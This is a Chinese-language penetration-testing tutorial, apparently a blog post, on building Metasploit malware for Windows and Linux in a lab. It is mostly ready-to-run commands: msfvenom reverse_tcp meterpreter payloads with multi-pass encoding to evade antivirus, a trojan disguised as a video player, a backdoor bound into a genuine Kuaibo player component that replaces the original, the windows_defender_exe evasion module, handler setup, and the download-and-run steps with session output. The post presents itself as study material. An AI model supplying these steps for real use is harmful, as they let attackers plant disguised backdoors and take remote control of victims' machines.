渗透测试 — Metasploit 内网渗透四 —— Metasploit 渗透测试之利用木马、病毒实施渗透 —— 制作 windows 和 linux 客户端恶意软件进行渗透

目录

制作 windows 和 linux 客户端恶意软件进行渗透

一、制作 Windows 恶意软件获取 shell

步骤和成果:

a、生成西瓜影音.exe 后门程序 ----生成木马

b、模拟黑客给真正的快播软件加上后门

c、使用 metasploit 的 evasion 模块生成后门木马

(1)生成西瓜影音.exe 后门程序         ——生成木马

1)msfvenom命令生成木马         ——命名为西瓜影音1

2)在 MSF 上启动 handler 开始监听后门程序

3)win7 访问运行 kali生成的木马恶意文件 --西瓜影音

A、在 Kali 上启动 apache 为后门程序提供下载地址

B、打开 win7 访问 Kali 搭建的 Web 服务下载执行文件---恶意文件

C、在 MSF 终端查看建立的 session

D、将会话保存到后台,方便以后使用

E、查看拿到会话后可以执行哪些命令

(2)、模拟黑客给真正的快播软件加上后门

1)msfvenom模块生成QvodTerminal.exe

A、先下载一个正常的快播软件

B、上传到 QvodTerminal.exe 到 kali 上

2)生成的木马替代快播相应源文件

A、对 QvodTerminal.exe 注入 payload 后门程序

B、将绑定了后门的 QvodTerminal.exe 替换win7的 QvodTerminal.exe

3)exploit/multi/handler模块开启监听后门,payload为windows/meterpreter/reverse_tcp

A、在 kali 上开始监听后门

B、打开快播主程序准备看苍老师电影

C、建立会话,后门运行成功

(3)使用 metasploit 的 evasion 模块生成后门

二、实战-制作 Linux 恶意软件获取 shell

(1)、使用 msfvenom 生成 linux 可执行文件

(2)、MSF 配置监听


Metasploitable2-linux:靶机 192.168.234.8

kali-debian:攻击机 192.168.234.141

win7 虚拟机:靶机 192.168.234.158

文件木马病毒载体快播软件(也可以自行下载软件):

链接:https://pan.baidu.com/s/16fjqVLSudhx5dh7qqSkkKA?pwd=d7jl 
提取码:d7jl 
 

在此声明文章仅供相互学习参考,严禁利用于违法犯忌,任何事故自行承担!!

制作 windows 和 linux 客户端恶意软件进行渗透

一、制作 Windows 恶意软件获取 shell

        msfvenom是msfpayload,msfencode 的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。

        Meterpreter攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!

步骤和成果:

a、生成西瓜影音.exe 后门程序 ----生成木马

        伪装成合法软件,http方式发起下载运行

         - msfvenom命令生成木马 ---命名为西瓜影音1
         - exploit/multi/handler模块开启监听后门,payload为windows/meterpreter/reverse_tcp
         - win7 访问运行 kali生成的木马恶意文件 --西瓜影音

b、模拟黑客给真正的快播软件加上后门

可以任意植入位置

        - msfvenom模块生成QvodTerminal.exe
        - 生成的木马替代快播相应源文件
        - exploit/multi/handler模块开启监听后门,payload为windows/meterpreter/reverse_tcp

c、使用 metasploit 的 evasion 模块生成后门木马

        - payload设置为windows/meterpreter/reverse_tcp

(1)生成西瓜影音.exe 后门程序         ——生成木马

1)msfvenom命令生成木马         ——命名为西瓜影音1

root@zwzj:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.234.141 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/西瓜影音1.exe                ——使用一个msfwenom生成木马程序

root@zwzj:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.234.141 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 | msfvenom -a x86 --platform windows -e x86/alpha_upper -i 10 -f exe -o /var/www/html/西瓜影音2.exe

                        ——使用两个msfwenom组合编码生成木马程序

参数说明:

        -a:指定架构如x86、x64,x86代表32位,x64代表64位。32位软件可以在64位系统上运行。

        --》所以我们生成 32 位的后门,这样在 32 位和 64 位系统中都可以使用。

        --platform:指定平台,这里选择 windows,通过 --l platforms可查看所有支持的平台

        -p:设置攻击载荷,使用windows/meterpreter/reverse_tcp,可通过-l payloads 查看所有攻击载荷

        LHOST:目标主机执行程序后连接我们 Kali 的地址

        LPORT:目标主机执行程序后连接我们 Kali 的端口

        -b:去掉坏字符,坏字符会影响 payload 正常执行。

扩展:

        \x00:代表16进制的“00”组成的字符串。通过ASCII码换成能识别的就是:"00" - "00000000"

        - NUL:由于"00000000"是不可见字符,所以代码中没用。如图:

        -e:指定编码器,也就是所谓的免杀,x86/shikata_ga_nai 是 msf 自带的编码器,可以通过 -l

        encoders:查看所有编码器

        -i:指定 payload 有效载荷编码迭代次数。 指定编码加密次数,为了让杀毒软件,更难查出源代码

        -f:指定生成格式,可以是 raw,exe,elf,jar,c 语言的,python 的,java 的……,用 -l formats查看所有支持的格式

        -o:指定文件名称和导出位置。指定到网站根目录/var/www/html,方便在肉机上下载后门程序

2)在 MSF 上启动 handler 开始监听后门程序

root@zwzj:~# msfconsole

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.234.141

msf6 exploit(multi/handler) > set LPORT 4444

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.234.141:4444

3)win7 访问运行 kali生成的木马恶意文件 --西瓜影音
A、在 Kali 上启动 apache 为后门程序提供下载地址

启动 apache,方便我们在 win7 上下载执行程序

root@zwzj:~# systemctl start apache2         ——kali 自带 apache 服务器

B、打开 win7 访问 Kali 搭建的 Web 服务下载执行文件---恶意文件

打开浏览器分别访问: http://192.168.234.141/西瓜影音 1.exe 和 http://192.168.234.141/西瓜影音2.exe

打开:VirusTotal

        使用 virustotal 检测下生成后门的免杀能力,VirusTotal.com 是一个免费的病毒,蠕虫,木马和各种恶意软件分析服务,可以针对可疑文件和网址进行快速检测,最初由 Hispasec 维护。它与传统杀毒软件的不同之处是它通过多种杀毒引擎扫描文件。使用多种反病毒引擎可以令用户们通过各杀毒引擎的侦测结果,判断上传的文件是否为恶意软件

        在win7双击运行西瓜影音 1.exe 程序(影音1和影音2任选一个即可)

                                                -----可以看到kai已得到获取shell.exe权限

C、在 MSF 终端查看建立的 session

meterpreter > ipconfig         ---Shell 中输入 ipconfig 查看 win7 主机的 IP 地址

meterpreter > dir         ---查看当前目录下的内容

D、将会话保存到后台,方便以后使用

meterpreter > background

msf6 exploit(multi/handler) > sessions                 ---查看会话

msf6 exploit(multi/handler) > sessions -i 1           ---指定会话 ID,调用新的会话

meterpreter > exit                 ---如果不想使用了,就退出,断开会话

E、查看拿到会话后可以执行哪些命令

meterpreter > help                 ---查看各类命令用法

(2)、模拟黑客给真正的快播软件加上后门

1)msfvenom模块生成QvodTerminal.exe
A、先下载一个正常的快播软件

        先查看主程序会调用哪些附加的小程序        -->把 payload 后门和这些小程序绑定到一起,也可以直接加到主程序上,但是加主程序上,有时报错。

        发现:当 QvodPlayer.exe 主程序运行时,会自动调用 QvodTerminal.exe 这个小程序。

B、上传到 QvodTerminal.exe 到 kali 上

2)生成的木马替代快播相应源文件
A、对 QvodTerminal.exe 注入 payload 后门程序

root@zwzj:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.234.141 LPORT=4444 -b"\x00" -e x86/shikata_ga_nai -i 10 -x QvodTerminal.exe -f exe -o /home/zwzj/QvodTerminal.exe         ----绑定后门

B、将绑定了后门的 QvodTerminal.exe 替换win7的 QvodTerminal.exe

在浏览器上访问:http://192.168.234.141/QvodTerminal.exe 下载 QvodTerminal.exe,将下载的 QvodTerminal.exe 替换原文件中的 QvodTerminal.exe

3)exploit/multi/handler模块开启监听后门,payload为windows/meterpreter/reverse_tcp
A、在 kali 上开始监听后门

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.234.141

msf6 exploit(multi/handler) > set LPORT 4444

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.234.141:4444

B、打开快播主程序准备看电影

C、建立会话,后门运行成功

(3)使用 metasploit 的 evasion 模块生成后门木马

evasion 是 metasploit 自带的模块,使用此模块可以生成反杀毒软件的木马 ---evasion [ɪˈveɪʒn] 逃避

msf6 > search evasion

msf6 > use evasion/windows/windows_defender_exe

msf6 evasion(windows/windows_defender_exe) > show options

msf6 evasion(windows/windows_defender_exe) > set FILENAME zj.exe ---配置文件名参数即可

msf6 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp

msf6 evasion(windows/windows_defender_exe) > set LHOST 192.168.234.141 ---本地监听 IP 和端口

msf6 evasion(windows/windows_defender_exe) > set LPORT 4444

msf6 evasion(windows/windows_defender_exe) > exploit         ---生成木马文件

开启监听后门木马

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.234.141

msf6 exploit(multi/handler) > set LPORT 4444

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.234.141:4444

root@zwzj:~# cp /root/.msf4/local/zj.exe /var/www/html/zj.exe

                        ——打开另一个终端,将生成的木马文件复制到 /var/www/html

在 win7 浏览器中 打开 http://192.168.234.141/zj.exe,运行 zj.exe

在 MSF 终端可以查看到已经建立 session

二、实战-制作 Linux 恶意软件获取 shell

(1)、使用 msfvenom 生成 linux 可执行文件

root@zwzj:~# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.234.141 LPORT=4444 -b "\x00" -i 10 -f elf -o /var/www/html/zj

参数和生成 Windows 差不多

                --platform 指定 linux

                -f 指定 elf 即 linux 操作系统的可执行文件类型

                -b 去掉坏字符

root@zwzj:~# /etc/init.d/apache2 start ----开启 apache

(2)、MSF 配置监听

root@zwzj:~# msfconsole

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.234.141

msf6 exploit(multi/handler) > set LPORT 4444

msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.234.141:4444

打开 Ubuntu zwzj linux 虚拟机,新建一个终端:

[root@zwzj~]# wget http://192.168.234.141/zj         ----下载后门

root@zwzj:~# chmod +x zj         ----添加执行权限

root@zwzj:~# ./zj         ---执行程序

回到 MSF 控制台,Session 已经建立

meterpreter > ifconfig

meterpreter > quit         ----或者exit

[*] Shutting down Meterpreter...

[*] 192.168.234.141 - Meterpreter session 2 closed. Reason: User exit

  • 18
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值